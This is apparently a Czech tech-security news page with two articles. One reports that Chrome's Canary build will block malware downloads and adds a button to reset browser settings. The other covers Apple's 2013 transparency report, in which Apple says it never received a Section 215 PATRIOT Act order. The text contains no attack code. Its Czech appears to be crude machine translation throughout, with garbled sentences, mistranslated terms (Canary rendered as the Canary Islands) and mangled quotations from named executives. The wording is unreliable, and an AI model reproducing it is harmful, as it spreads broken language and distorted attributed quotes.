Nový přírůstek do Chrome už je ve vývoji frontě, objevit se ve společnosti Kanárských kanál, který je nejdříve vývoj verze k dispozici. Tato funkce je určena k ochraně uživatele proti druhu malware, který je často nainstalován s vědomím uživatelů, a provést změny svých strojů nebo nainstalovat jiné škodlivé komponenty, jako jsou keyloggery a trojské koně.
Díky této nové funkce povolena, bude Chrome zobrazí uživatelům malé oznámení v dolní části okna prohlížeče, který je upozorňuje, že stahování bylo zablokováno automaticky.
"V současné Kanárských stavět Chrome, budeme automaticky blokovat stahování malwaru, který se zachytí. Pokud vidíte tuto zprávu v sekci ke stažení zásobníku v dolní části obrazovky, můžete kliknout na "Odmítnout" vědět Chrome se snaží udržet v bezpečí, "Linus Upson, viceprezident společnosti Google, uvedl na svém blogu vysvětluje změny.
"Toto je navíc k 10.000 nových stránkách jsme vlajky na den s Bezpečné prohlížení , která se používá v Chrome a další prohlížeče, aby více než 1 miliarda internetových uživatelů v bezpečí. "
Spolu s přidáním automatické blokování škodlivého stažení, nadcházející verze Chrome bude také mít funkci, která se vrátit zpět prohlížeče uživatelů nastavení do původního stavu pouhým stisknutím tlačítka. To může pomoci uživatelům zotavit se z malware, který mění nastavení prohlížeče, obnoví domovských stránkách a brání uživatelům "od odstranění plugin nebo rozšíření.
"Zlí hoši přimět vás k instalaci a spuštění tohoto druhu softwaru, neboť shrnují s něčím budete chtít, stejně jako bezplatné spořiče obrazovky, videa nebo plugin-ironický má bezpečnostní aktualizace . Tyto škodlivé programy se maskují, takže nebudete vědět, že tam jsou a mohou změnit domovskou stránku, nebo injekci reklamy na stránkách, které procházíte. Horší je, že blokují vaši schopnost změnit své nastavení a zpět, aby se těžké odinstalovat, udržet si v pasti nežádoucího stavu, "řekl Upson.
"Jsme kroky, které vám pomohou, včetně přidání "reset nastavení prohlížeče" tlačítko v poslední aktualizaci Chrome, který vám umožňuje snadno vrátit Chrome z výroby čerstvém stavu. Můžete je najít v "Advanced Settings" v nastavení Chrome. "
Apple říká, že "nikdy obdržel rozkaz podle § 215"
6.11.2013 Zabezpečení | Kriminalita
V nové zprávě podrobně počet a druh žádostí o informace o uživateli se to dostali od různých vlád, Apple řekl, že nikdy neobdržela žádost o informace podle § 215 zákona USA PATROT a pravděpodobně by bojovat jeden, pokud to vůbec přišlo. Společnost také odhalila, že obdržel mezi 1000 a 2000 žádostí o uživatelských dat ze Spojených států od ledna, ale není jasné, kolik z těchto požadavků je splněna, protože omezení vládních míst USA o tom, jak firmy mohou nahlásit údaje.
Právě teď, že problém tzv. zprávy o průhlednosti společnosti jako Apple, Google a další je povoleno hlásit množství žádostí, které se dostanou v krocích po 1000. Takže Apple zpráva ukazuje, že i když se dostal 1000-2000 žádostí o uživatelských dat tak daleko v roce 2013, je číslo, které bylo v souladu s uveden jako 0-1,000. Apple, spolu s řadou dalších firem, včetně Google a Microsoft, požádala vládu v posledních měsících na dovolení zveřejnit konkrétnější počtem požadavků, včetně konkrétních čísel národní bezpečnosti dopisů.
"V době vypracování této zprávy, že americká vláda neumožňuje Apple zveřejňovat, s výjimkou v širokých rozsazích, řada bezpečnostních pokynů národních počet účtů, které jsou na objednání, nebo zda obsah, jako jsou e-maily, byly poskytnuty. Důrazně proti tomuto roubík pořádek, a Apple učinil důvod pro osvobození od těchto omezení na setkání a diskuse s Bílého domu, americký generální prokurátor, představitelé Kongresu, a soudy. Přes naše značné úsilí v této oblasti, jsme dosud nemají dohodu, která se cítí být přiměřeně řeší právo našich zákazníků vědět, jak často a za jakých okolností můžeme poskytovat údaje orgánům činným v trestním řízení, "Apple uvedli ve zprávě.
Vzhledem k tomu, informace týkající se monitorovací metody a možnosti NSA se nashromáždily v posledních několika měsících, mnoho tech společnosti být více slyšet při projednávání žádostí, které dostanete od vládních agentur a vymáhání práva. Google, Yahoo, Microsoft a Apple se ocitly bránit své postupy a snaží se ujistit uživatele, že neposkytují přímý přístup ke svým serverům nebo datové spojení pro účely vymáhání práva. Ačkoli vláda omezovaly na to, jak moc tyto společnosti mohou odhalit o objemu a druhu žádostí, které dostanou, Apple zahrnovaly jednu specifickou linii ve své zprávy o průhlednosti, která jde tak daleko, jak je přípustné právě teď.
"Apple se nikdy nedostal rozkaz podle § 215 zákona USA PATRIOT Act. Očekávali bychom, že napadnout takový příkaz, pokud sloužil na nás, "uvádí se ve zprávě.
Článek 215 je bit, který je používaný NSA sbírat obchodní záznamy, jako jsou metadata telefonního hovoru.
Zpráva dále uvádí, údaje o tom, kolik žádostí Apple se dostal z desítek dalších vlád, s nejvyšším počtem prozatím 127 z Velké Británie Apple obrátil některých údajů v 37 procentech těchto žádostí. Příští nejvyšší objem žádostí pocházela ze Španělska, který vydal 102, v 22 procentech z nich Apple předal některých uživatelských dat.
Úvod 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35